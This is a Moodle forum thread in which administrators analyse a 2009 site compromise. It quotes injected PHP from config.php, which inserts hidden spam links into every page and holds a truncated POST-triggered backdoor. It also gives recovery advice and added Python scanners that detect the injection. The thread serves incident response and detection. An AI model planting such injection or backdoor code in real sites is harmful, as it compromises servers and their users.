Seems like our Moodle site has been hacked

by Martin O'Mahony -
Number of replies: 14
I noticed that the TinyMCE wouldn't work. While looking at my 1.9.5+ installation I came across a modified config.php. According to the timestamp it was changed while this was happening on Apache:

207.7.122.227 - - [29/Jun/2009:12:05:38 +0200] "POST /moodle//help.php HTTP/1.1" 200 11 "-" "-"
88.214.193.124 - - [29/Jun/2009:12:05:42 +0200] "GET /moodle/ HTTP/1.1" 303 242 "-" "-"
88.214.193.124 - - [29/Jun/2009:12:05:43 +0200] "GET /moodle/login/index.php HTTP/1.1" 200 150114 "-" "-"

Does this look familiar to anyone? Can anyone please tell me what really happened?

The result was this at the top of my config.php. What does it do?

<?php $links = '
xeex1012906
<a href=http://atsosxdev.doit.wisc.edu/aris/games/Framework/Site/?q=index>debt consolidation</a>
### Hundreds of lines like this omitted ###
';

// Output-buffer callback: finds the opening <body> tag and inserts the
// hidden block of spam links right after it on every page served.
function output_callback($str)
{
    GLOBAL $links;
    preg_match("|<body[^>]*>|",$str,$arr);
    return str_replace($arr[0],$arr[0].'<i style="display:none">'.$links.'</i>',$str);
}

// Helper that fetches the contents of a remote URL.
function get_page($url)
{
    return file_get_contents($url);
}

// Truncated in the original post: the branch that runs when 'code' is POSTed to this file.
if(isset($_POST['code']) && $_POST['code'])


I changed the perms to 644 root.root. Hope this helps prevent something like this.
In reply to Martin O'Mahony

Re: Seems like our Moodle site has been hacked

by Martin O'Mahony -
Apologies for replying to my own message.

But could anyone please explain to me what the above script did? It seems like a total mystery to me. I need to know if any of our data has been compromised.

In reply to Martin O'Mahony

Re: Seems like our Moodle site has been hacked

by Mauricio Pérez Llantén -
Hi,

It is not only a Moodle problem; there is a link about Drupal with the injection.

http://drupal.org/node/432074

The HREF links to many e-learning sites.

Question:

Is it possible that the injection can be made with ...

#########################
# Moodle Exploit Method #
#########################
... ... exploit deleted ... ... ... ... exploit deleted ... ...

Best regards.

Mauricio Pérez

(Edited by Eloy Lafuente (stronk7) - Monday, 7 September 2009, 22:28) Please do not post exploits in public forums. It's really one bad and dangerous habit. TIA!

In reply to Martin O'Mahony

Re: Seems like our Moodle site has been hacked

by Nicolas Dunand -
Hello Martin,

What this code does is to add these (hundreds of) links at the end of the HTML <body> tag, probably on every one of your Moodle pages. These links are invisible (see the "display:none"), but in fact exist on your pages. Spammers often use this.

It seems your site has indeed been hacked. See some info on what to do here:
http://docs.moodle.org/en/Hacked_site_recovery

Your chmod 644 indeed prevents further config.php modifications, but from the last line you show (the one with "$_POST"), it seems the hacker left himself an open door: POSTing data to your config.php could trigger more or less anything.

What I would do is to IMMEDIATELY completely stop the web server, or unplug the network cable to be sure, and then read the Moodle docs page I indicated. With some luck, only your config.php file has been hacked, and you could replace it with a fresh one (be sure to write down DB connection details etc. though).

In reply to Nicolas Dunand

Re: Seems like our Moodle site has been hacked

by Martin O'Mahony -
Hello Nicolas, hello everybody else,

Thank you so much for your reply. As my knowledge about PHP is quite lacking, unfortunately, I would like to ask you if the steps I took were sufficient:

Of course I immediately took the server offline. Then I deleted the infected Moodle software completely and installed the current 1.9.5+ files from moodle.org. I then restored an old (untainted) version of the config.php.

I did not erase the moodledata directory as some students' works are in there that hadn't been backed up. I did, however, erase all the language files (also php) and downloaded new versions. I found no other files with a *.php* extension in the data directory except for the languages. By the way, the moodledata directory is not under the htdocs directory.

Do you think these precautions are sufficient? I'm running a pretty standard issue openSuSE machine.

When you say that the $_POST could have triggered "anything", where else should I look for modifications? Is it only php files that could be time bombs?

Should I scan the database for anything? And is there anything I should look for in the moodledata directory?

Martin

In reply to Martin O'Mahony

Re: Seems like our Moodle site has been hacked

by Nicolas Dunand -
Hello again,

Well, if you deleted the compromised Moodle files without backing them up, it will be difficult to sort out what happened. If you still have your config.php, could you please post it here? (Be sure to remove both lines containing your DB username and password though.) It could help us know what kind of an attack type this was.

By the way, it is correct for the moodledata folder not to be under the htdocs directory.

As for looking for modifications, I would look at moodle/help.php (the original hacked-moodle one), because it seems strange someone would POST to it (according to your Apache log file).

Regarding the $_POST section of your hacked config.php file, I would suggest looking for any line in your Apache logs mentioning HTTP access to this config.php file (which I think should never be called directly). Something like this in Bash should do it:
grep "config.php" /path/to/your/apache.access.log >> somefile.log.txt
Repeat this for each Apache access log file.

To help you further, I would need:
  • the incriminated moodle/config.php file
  • the possibly compromised moodle/help.php file
  • the somefile.log.txt you would just have built

I have to stress that the only reliable recovery solution would be (as explained in the MoodleDocs page I linked in my last post, and summarized here) to:
  1. unplug the network cable
  2. identify the time of hacking and possibly the hacking method as well
  3. rebuild the server from scratch using different passwords
  4. take into account the hacking method if the hacking was due to an incorrect server configuration, and correct the server configuration if necessary
  5. recover from last backup before hack time
  6. upgrade to latest Moodle stable version
  7. plug network cable again
But if you wish to answer my three points above (Apache logs, and possibly compromised files), we might be able to resolve point 2, which would help us know (to answer your question) if the steps taken were sufficient or not.

Regards.
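As an added example that is not part of this thread, a small Python checker that does what the grep above does for config.php and also flags the POST to help.php seen in Martin's first excerpt. It parses Apache access-log lines in the same format; the sample lines are constructed (RFC 5737 test addresses), not taken from a real server.

```python
import re
from datetime import datetime

# Apache access-log line in the shape shown in the thread, e.g.
# 1.2.3.4 - - [29/Jun/2009:12:05:38 +0200] "POST /moodle//help.php HTTP/1.1" 200 11 "-" "-"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

def parse_line(line):
    """Return a dict for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    # drop the query string and collapse "//" so /moodle//help.php matches /moodle/help.php
    rec["path"] = re.sub(r"/+", "/", rec["path"].split("?", 1)[0])
    return rec

def suspicious_requests(lines):
    """Flag the two patterns Nicolas asks Martin to grep for: any direct hit on
    config.php (never legitimate) and any POST to help.php (help.php is only read)."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        base = rec["path"].rsplit("/", 1)[-1]
        if base == "config.php":
            reason = "direct access to config.php"
        elif base == "help.php" and rec["method"] == "POST":
            reason = "POST to help.php"
        else:
            continue
        hits.append((rec["ip"], rec["ts"].isoformat(), rec["method"], rec["path"], reason))
    return hits

# Constructed sample lines (RFC 5737 test addresses) mirroring the thread's excerpt.
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Jun/2009:12:05:38 +0200] "POST /moodle//help.php HTTP/1.1" 200 11 "-" "-"',
    '198.51.100.7 - - [29/Jun/2009:12:05:42 +0200] "GET /moodle/ HTTP/1.1" 303 242 "-" "-"',
    '198.51.100.7 - - [29/Jun/2009:12:05:43 +0200] "GET /moodle/login/index.php HTTP/1.1" 200 150114 "-" "-"',
    '192.0.2.10 - - [29/Jun/2009:12:06:01 +0200] "GET /moodle/config.php HTTP/1.1" 200 0 "-" "-"',
    '203.0.113.5 - - [29/Jun/2009:12:07:15 +0200] "GET /moodle/help.php?file=x.html HTTP/1.1" 200 4096 "-" "-"',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(*hit)
```

Feed it every rotated access log; a normal GET to help.php with a query string is deliberately not reported.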
In reply to Nicolas Dunand

Re: Seems like our Moodle site has been hacked

by Martin O'Mahony -
Hi Nicolas,

Thank you so much for your help! I've been busy looking into the "status" of our server. And it seems like the attack only altered the aforementioned config.php.

Basically the segment I quoted earlier was added to the config.php ending with a ?>. After that the normal Moodle config.php was preserved. To check whether other files were modified, I did a find . -mtime -4 (because it had been four days since the attack on June 29th) and every file that showed up checked out just fine. So apparently the attack was confined to the config.php - a fact that left me worried of course. After resetting all the perms to root.root 644 I hope to prevent any similar attacks. I had a look at a database dump. Well, I couldn't find anything. Then I wasn't quite sure what I was looking for. That database is rather enormous. So, what should I be looking for there?

I am pretty sure that the attack succeeded through a hole in PHP - despite daily updates. I hope it will be fixed soon.

About the Apache logs, I find no such reference to when config.php was ever accessed. Probably the verbosity level is unsuitable for such details?! I got requests for other php files, though, that seem normal.

Kind regards,
Martin

In reply to Nicolas Dunand

Re: Seems like our Moodle site has been hacked

by António Gonçalves -
Hello Nicolas, what do you think we could do to prevent this hack? Set permissions? And what type, and on what crucial files and folders? Thanks, António
In reply to António Gonçalves

Re: Seems like our Moodle site has been hacked

by Martin O'Mahony -
Hi António,

With my setup it really was the perms that made the intrusion possible. However, it seems like the real problem was (is?) a security gap in PHP.

So setting everything in the Moodle directory to root.root 644 is probably a wise first step.
In reply to António Gonçalves

Re: Seems like our Moodle site has been hacked

by Nicolas Dunand -
Hello,

I would say that setting correct file permissions in your filesystem is one of the first (and most crucial) steps towards server security.

For a more comprehensive list of things to keep in mind, I suggest reading the following MoodleDocs pages: Security, Security FAQ, and Hacked site recovery.
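An added example, not from this thread or from Moodle: a Python scan that walks a Moodle code tree for two things the replies above discuss, PHP files carrying the marker strings of the config.php injection quoted at the top of the thread (the check Martin did by hand after his find . -mtime), and files that group or other can write to (anything looser than the 644 or 500 recommended here). The marker regexes and the sample files it builds in a temporary directory are constructed for this example.

```python
import os, re, shutil, stat, tempfile

# Constructed regexes for the backdoor quoted at the top of this thread: a hit means
# the file must be replaced, a miss proves nothing about other backdoors.
MARKERS = {
    "hidden link block": re.compile(r'<i\s+style="display:\s*none">', re.I),
    "body-tag rewrite callback": re.compile(r'preg_match\(\s*"\|<body', re.I),
    "POST-triggered code hook": re.compile(r"\$_POST\[\s*['\"]code['\"]\s*\]"),
}
WRITE_BITS = stat.S_IWGRP | stat.S_IWOTH  # set on any mode looser than 644 or 500

def scan_tree(root):
    """Report, relative to root, PHP files carrying the markers and group/other-writable files."""
    out = {"injected": {}, "writable": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            if os.stat(full).st_mode & WRITE_BITS:
                out["writable"].append(rel)
            if name.endswith(".php"):
                with open(full, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
                hits = [m for m, rx in MARKERS.items() if rx.search(text)]
                if hits:
                    out["injected"][rel] = hits
    return out

# Constructed samples: a config.php carrying the thread's injection, and a clean lib file.
INJECTED = """<?php $links = '<a href=http://spam.invalid/?q=index>debt consolidation</a>';
function output_callback($str) { GLOBAL $links; preg_match("|<body[^>]*>|",$str,$arr);
 return str_replace($arr[0],$arr[0].'<i style="display:none">'.$links.'</i>',$str); }
if(isset($_POST['code']) && $_POST['code']) { /* placeholder */ } ?><?php $CFG = new stdClass();
"""
CLEAN = "<?php\n$CFG = new stdClass();\n$CFG->dbtype = 'mysql';\n"

def demo():
    """Build the sample tree in a temp dir, scan it, clean up, return the findings."""
    base = tempfile.mkdtemp()
    try:
        os.makedirs(os.path.join(base, "moodle", "lib"))
        for rel, body, mode in (("moodle/config.php", INJECTED, 0o666),
                                ("moodle/lib/setup.php", CLEAN, 0o644)):
            path = os.path.join(base, rel)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
            os.chmod(path, mode)  # 0o666 is the weak setting, 0o644 the thread's fix
        return scan_tree(base)
    finally:
        shutil.rmtree(base)
```

Run scan_tree against the real web root; a clean result from the marker check still does not replace a full reinstall from fresh Moodle files.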
In reply to Nicolas Dunand

Re: Seems like our Moodle site has been hacked

by Anand Pai -
Hi Nicolas,

Last week I had a similar type of problem.

There is some strange code in login.php, as follows. I am pasting the view-source output, since this hacking code is not visible in either index.php or in the included HTML file.

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link href="css/style.css" rel="stylesheet" type="text/css">
<style type="text/css">
<!--
body {
background-color: #E2E8DC;
background-image: url(images/login-bg.jpg);
background-repeat: repeat-x;
margin-left: 0px;
margin-top: 0px;
margin-right: 0px;
margin-bottom: 0px;
}
-->
</style><title>mySIS</title></head>
<body><i style="display:none">
</i>
<!-- ImageReady Slices (SIS_login_screen.psd) -->
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td align="center"><img src="images/spacer.gif" width="7" height="7"></td>
</tr>
<tr>
<td align="center" valign="top"><table width="647" border="0" cellpadding="0" cellspacing="0">
<tr>
<td><img src="images/login-top.jpg" width="647" height="216" alt=""></td>
</tr>
<tr>
<td><table width="100%" border="0" cellspacing="0" cellpadding="0">


What is your suggestion? How do I resolve this?
Also I want to find out which file has been hacked.
Expecting your valuable suggestions in this regard.


In reply to Anand Pai

Re: Seems like our Moodle site has been hacked

by Mary Cooch -
Hello there - yes you have definitely been hacked. This is a good starting point if you read this: http://docs.moodle.org/en/Hacked_site_recovery
In reply to Mary Cooch

Re: Seems like our Moodle site has been hacked

by Jenny Watt -
Hi, All!

We are hosting on a site and have done all the security plugging we can within the confines of the host. But still on a daily basis we get hacked. The log file shows they are posting data to the help.php file. So I started writing all the POST data out and captured the attached.

It looks like they are posting PHP code to edit the config.php to insert the code. Even when I set the config.php to 600 they still hack, but the owner (and group) are my user, which is, unfortunately, a limit of the hosting.

So, since it does not appear that we ever get POST data to that file in normal use, I am checking for the existence of the POST data and then killing the script.

Any ideas how to stop this?
In reply to Jenny Watt

Re: Seems like our Moodle site has been hacked

by Mauno Korpelainen -

Could the attacker script be inside, not outside? Using a Base64 decoder

http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/Default.aspx

param1 and param2 look very similar to all the injected code before.

In http://moodle.org/mod/forum/discuss.php?d=111710 the madshell script could be used like any external file manager to attack again and again, if the actual origin of the attacks was there. After removing the madshell script (the name of the file can be anything...) permissions of 644 for files helped, at least in that single case I have seen personally.

If nothing else helps, cleaning the whole site (not only Moodle but also other CMS applications etc. that might have injected PHP files, and the site's main index.php file) and changing addresses might stop the attacks.

In reply to Jenny Watt

Re: Seems like our Moodle site has been hacked

by Howard Miller -
Did you do the security plugging *after* the initial attack?

If so, the chances are you are still infected but you just haven't found it. Completely (I do mean completely) replace the Moodle code with fresh and apply appropriate permissions and security.

If the host is configured in some crazy way that enables the web server to write to files owned by you where only you have access, then I would change hosts! BTW, you don't need to write to the Moodle folders either - 500 permissions would be even better!